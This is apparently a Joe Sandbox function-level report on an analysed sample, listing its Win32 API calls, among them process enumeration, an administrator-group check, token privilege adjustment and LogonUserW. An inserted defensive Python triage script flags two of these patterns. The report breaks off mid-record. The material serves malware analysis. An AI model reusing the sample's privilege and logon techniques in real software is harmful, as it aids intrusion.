                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002B4B57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 0d1492a1ef36ae4aa35d7e124890b5769789c0b70b9c5cb2f59d4d2e9ffbd1d5
                                                                                                                    • Instruction ID: c0906ac8660109dca31fb4d482681af7cb8645361240435c52986b437df5cd93
                                                                                                                    • Opcode Fuzzy Hash: 0d1492a1ef36ae4aa35d7e124890b5769789c0b70b9c5cb2f59d4d2e9ffbd1d5
                                                                                                                    • Instruction Fuzzy Hash: 9ED01274E10713CFDB21AF31E898B86B6D8AF05395F518839D486D6160D774D480C654
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0032EE3D
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0032EE4B
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0032EF0B
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0032EF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2576544623-0
                                                                                                                    • Opcode ID: 8aa73557eacedf7d6d413320357fa23aef6c4efd2843c11eb9b6cc055ae40b3b
                                                                                                                    • Instruction ID: 2e83366de50a181b22664f1227587c4b691144a248b92a5bbac44a6db2b07878
                                                                                                                    • Opcode Fuzzy Hash: 8aa73557eacedf7d6d413320357fa23aef6c4efd2843c11eb9b6cc055ae40b3b
                                                                                                                    • Instruction Fuzzy Hash: 0651C071518711AFD311EF20DC82EABB7E8EF94740F40492DF595972A1EB70E918CB92
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0030E628
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: c82c05bb8b7cd8ee3a6f0818df37937a3d7204e7349b6e474ddf272c7ad234ab
                                                                                                                    • Instruction ID: 3530fbe17a89de02f67a6bf4ba03dfe86b5b11a704d6685afb7aad95d36304b7
                                                                                                                    • Opcode Fuzzy Hash: c82c05bb8b7cd8ee3a6f0818df37937a3d7204e7349b6e474ddf272c7ad234ab
                                                                                                                    • Instruction Fuzzy Hash: 1D324675A017059FDB29CF19C490A6AB7F1FF48320B15C86EE89ADB7A1E770E941CB40
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0032180A,00000000), ref: 003223E1
                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00322418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: 4e042bd4f4305aa9689ed0e9e658bfe70b897da4da5e14ac53239c949b20606e
• Instruction ID: 9db1a9c74dbd5661046cdf74c6276e5480cd21f55cc83d3c86b0f5eaf6719f7d
• Opcode Fuzzy Hash: 4e042bd4f4305aa9689ed0e9e658bfe70b897da4da5e14ac53239c949b20606e
• Instruction Fuzzy Hash: 0A41F675904219BFEB12DE96EC85FBBB7BCEB40314F10406AFA01A6241DA759E419A60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0031B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0031B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0031B3EA
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b1c0de9bff087e972a13333a44214a591d1fa79eda21a9dca46e00078e2488ef
• Instruction ID: 47c4cbcaa46e1c3652de47339d9b6bfceacb0e2fcce778a7569d2562a8cc8cf7
• Opcode Fuzzy Hash: b1c0de9bff087e972a13333a44214a591d1fa79eda21a9dca46e00078e2488ef
• Instruction Fuzzy Hash: F1215E35A00518EFCB01EFA5D881AEDBBB8FF49310F1480AAE905AB351CB319965CF50
APIs
  • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
  • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
• GetLastError.KERNEL32 ref: 00308865
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 984aeafa57afdf3a819c61c13a1fa7f9e2d1780376837fc6cd75d9719cac3e24
• Instruction ID: 369785a5e8db4204feac17ca32acb8ddedd04f172601662952eda91a64cc6585
• Opcode Fuzzy Hash: 984aeafa57afdf3a819c61c13a1fa7f9e2d1780376837fc6cd75d9719cac3e24
• Instruction Fuzzy Hash: 3F116AB2914204AFE719DFA4DCC5D6BB7BDFB44710B60C52EE49697651EA30AC408B60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00308774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0030878B
• FreeSid.ADVAPI32(?), ref: 0030879B
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: ffafc52fb799936b0b985a33512ea87cd645a3accdc5c43f035d65d88e922628
• Instruction ID: 57df715b1e563f907da6e95d4244c91062e34087576baab051463afe71d15286
• Opcode Fuzzy Hash: ffafc52fb799936b0b985a33512ea87cd645a3accdc5c43f035d65d88e922628
• Instruction Fuzzy Hash: 12F03775E1120CBFDB04DFE49D89ABEBBBCEF08301F5044A9A905E2181E6716A048B50
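The two records above contain the call sequences an analyst normally wants to pick out of a Joe Sandbox function listing: AllocateAndInitializeSid with sub-authority count 2 and RIDs 0x20 and 0x220 followed by CheckTokenMembership, which is the standard test for membership in BUILTIN\Administrators (SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS), and LookupPrivilegeValueW followed by AdjustTokenPrivileges, a privilege-enable sequence. The report does not reveal which privilege is enabled, because the lpName argument is logged as 00000000. The following Python is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in the format used on this page and flags those two patterns. The sample inputs are the API lines copied from the two records; the ApiCall type and the function names are this example's own.

```python
"""Triage Joe Sandbox function "APIs" blocks for known Win32 call patterns.

Added example: not part of the Joe Sandbox report and not code from the
analysed sample. The sample inputs below are the API lines copied from the
two records above (privilege adjustment and admin-group check).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Sub-authority RIDs of S-1-5-32-544 (BUILTIN\Administrators).
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220

# One report line: optional "Part of subcall function X:" prefix, then
# Name.MODULE, an optional "(args)" list, then "ref: ADDR".
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # hex literals as int, "?" (not logged) as None
    ref: int                    # call-site address inside the function
    nested: bool                # True for "Part of subcall function" entries


def parse_api_lines(block: str) -> List[ApiCall]:
    """Extract the API calls of one block; lines that are not API entries are ignored."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("caller") is not None))
    # Direct calls ordered by call-site address give the static order within the
    # function; subcall entries belong to a different function and are kept last.
    return sorted(calls, key=lambda c: (c.nested, c.ref))


def is_admin_membership_check(calls: List[ApiCall]) -> bool:
    """AllocateAndInitializeSid(.., 2, 0x20, 0x220, ..) followed by CheckTokenMembership."""
    direct = [c for c in calls if not c.nested]
    for i, c in enumerate(direct):
        if c.name != "AllocateAndInitializeSid" or len(c.args) < 4:
            continue
        wanted = [2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS]
        if c.args[1:4] == wanted and any(d.name == "CheckTokenMembership" for d in direct[i + 1:]):
            return True
    return False


def privilege_enable_sequence(calls: List[ApiCall]) -> Optional[str]:
    """LookupPrivilegeValueW followed by AdjustTokenPrivileges.

    Returns a note about the lpName argument (second parameter) or None. The
    sandbox logs an unresolved pointer as 00000000 or "?", in which case the
    privilege name cannot be read from the report.
    """
    direct = [c for c in calls if not c.nested]
    for i, c in enumerate(direct):
        if c.name != "LookupPrivilegeValueW":
            continue
        if any(d.name == "AdjustTokenPrivileges" for d in direct[i + 1:]):
            lp_name = c.args[1] if len(c.args) > 1 else None
            return "privilege name not logged" if not lp_name else f"lpName=0x{lp_name:08X}"
    return None


def triage_block(block: str) -> List[str]:
    """Return human-readable findings for one function block."""
    calls = parse_api_lines(block)
    findings = []
    if is_admin_membership_check(calls):
        findings.append("checks membership in BUILTIN\\Administrators (RIDs 0x20/0x220)")
    note = privilege_enable_sequence(calls)
    if note:
        findings.append(f"enables a token privilege ({note})")
    return findings


# Sample inputs copied from the two report records above.
PRIVILEGE_BLOCK = """\
APIs
  • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
  • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
• GetLastError.KERNEL32 ref: 00308865
"""

ADMIN_CHECK_BLOCK = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00308774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0030878B
• FreeSid.ADVAPI32(?), ref: 0030879B
"""

if __name__ == "__main__":
    for label, block in (("privilege block", PRIVILEGE_BLOCK), ("admin-check block", ADMIN_CHECK_BLOCK)):
        print(label, "->", triage_block(block))
```

The sequence checks deliberately use only the direct calls of a block: the "Part of subcall function" entries describe a callee that Joe Sandbox folds into the listing, so they must not be matched as if they were executed inline by the function being triaged.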
APIs
• __time64.LIBCMT ref: 0031889B
  • Part of subcall function 002D520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00318F6E,00000000,?,?,?,?,0031911F,00000000,?), ref: 002D5213
  • Part of subcall function 002D520A: __aulldiv.LIBCMT ref: 002D5233
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: 0e7
• API String ID: 2893107130-2065499759
• Opcode ID: 59e8db6542342fbf55b0e44d8f2710b4e72ee9e1fb6065adc004315b698284dd
• Instruction ID: 93b7e418a2980e9bd53c2a4060167c900e3038d2dfc17d84a106c77f5c0394df
• Opcode Fuzzy Hash: 59e8db6542342fbf55b0e44d8f2710b4e72ee9e1fb6065adc004315b698284dd
• Instruction Fuzzy Hash: 4A21E732635510CBC32ACF29D451A91B3E5EFA9320F688E2CD0F9CB2C0CA34B945DB54
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0031C6FB
• FindClose.KERNEL32(00000000), ref: 0031C72B
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 4ef2f50a9fd8828e2acf43ab1c7596d0e0962df58963681c15774cd513efe307
• Instruction ID: a12c04e54f555783fd6c6719715aa0ca03e6d3a841d31ea683de23482176b892
• Opcode Fuzzy Hash: 4ef2f50a9fd8828e2acf43ab1c7596d0e0962df58963681c15774cd513efe307
• Instruction Fuzzy Hash: AD11A1766102009FDB10EF29D885A6AF7E8FF89364F00851DF9A9C72A1DB70AC11CF81
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00329468,?,0033FB84,?), ref: 0031A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00329468,?,0033FB84,?), ref: 0031A0A9
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 86b0320dd3c5c7bbda274b7afc97bfb66355efdadcac930c74d0a0a181f72094
• Instruction ID: e389000cd692a97882d799e99670361d6c55c47e7533e9803a4c9e9561002639
• Opcode Fuzzy Hash: 86b0320dd3c5c7bbda274b7afc97bfb66355efdadcac930c74d0a0a181f72094
• Instruction Fuzzy Hash: 15F0E23550522DABDB229FA4CC88FEA736CBF0C362F004165F808D2181C6309954CBA1
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308309), ref: 003081E0
• CloseHandle.KERNEL32(?,?,00308309), ref: 003081F2
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: fb1b7c7fc45cac51d1f276d213ab04be2f36749e0f9827e7917c2519423906f5
• Instruction ID: 6f5445e4b999367e20e962ca51977a2e7405d63011eb63eb997f307699914e19
• Opcode Fuzzy Hash: fb1b7c7fc45cac51d1f276d213ab04be2f36749e0f9827e7917c2519423906f5
• Instruction Fuzzy Hash: A7E0E671011510AFE7262B74EC45E7777EDEF04310F14C82EF49584470DB615CA1DB10
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,002D8D57,?,?,?,00000001), ref: 002DA15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002DA163
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 50bae8e399822fe7cdc2f750ac920b66483313298984c57e87c8ca1ee72bbbbb
• Instruction ID: 2ad854581c62f698663a36b62aa31a19551c760a9f85d7e2a8d6db418fd93046
• Opcode Fuzzy Hash: 50bae8e399822fe7cdc2f750ac920b66483313298984c57e87c8ca1ee72bbbbb
• Instruction Fuzzy Hash: E3B09235454208AFCA022B91EC49B8A3F6CEB45BB2F804020F60D85060CB6254508A91
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bb56866162204efcfa6835379a01b1fb9672ebc75b55a849ca833d2f57fa2cd
• Instruction ID: e89910ffaa2cae736eb7c43cba25df076bc1d403f8d81cb363afcf0f08a0a186
• Opcode Fuzzy Hash: 4bb56866162204efcfa6835379a01b1fb9672ebc75b55a849ca833d2f57fa2cd
• Instruction Fuzzy Hash: 5632F125D39F414DD7639A34D932326A24CAFB73C4F15D737E81AB9AA6EF28D8834104
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f11f595070ad42e6913cc9706edb1e207a1cf6e222fbcc71f7c13d742ac579c0
                                                                                                                    • Instruction ID: 09602bdf30d45eb30b1e2cd526145bef3a89c154ed070580ed83eb729808cbbc
                                                                                                                    • Opcode Fuzzy Hash: f11f595070ad42e6913cc9706edb1e207a1cf6e222fbcc71f7c13d742ac579c0
                                                                                                                    • Instruction Fuzzy Hash: F2B1E124E6AF414DD3239A398831336B65CAFBB2D5F91D71BFC2678E22FB2195834141
                                                                                                                    APIs
                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00314C4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: ba1391d85a3487288b9f1a0e701d2d1aa970b6cb9cc2431eed910cd05204ef40
                                                                                                                    • Instruction ID: bf3f8766dfe6861522a826e6ba3852aa31e0a038745eb73d96285a0742b4df44
                                                                                                                    • Opcode Fuzzy Hash: ba1391d85a3487288b9f1a0e701d2d1aa970b6cb9cc2431eed910cd05204ef40
                                                                                                                    • Instruction Fuzzy Hash: 6DD05EA116520938FC1E0720AE0FFFB010DE308792FD9814971028A0C1EC805CC05070
                                                                                                                    APIs
                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00308389), ref: 003087D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LogonUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1244722697-0
                                                                                                                    • Opcode ID: 9cbfea4c9d486d9b24c1f650519e7f9e684ed805390135369ffddd1643d6eddb
                                                                                                                    • Instruction ID: 7e8cffc4314bf0208a5ba84b45077ce49b78128ed2aecf75a0599bd3b81df12d
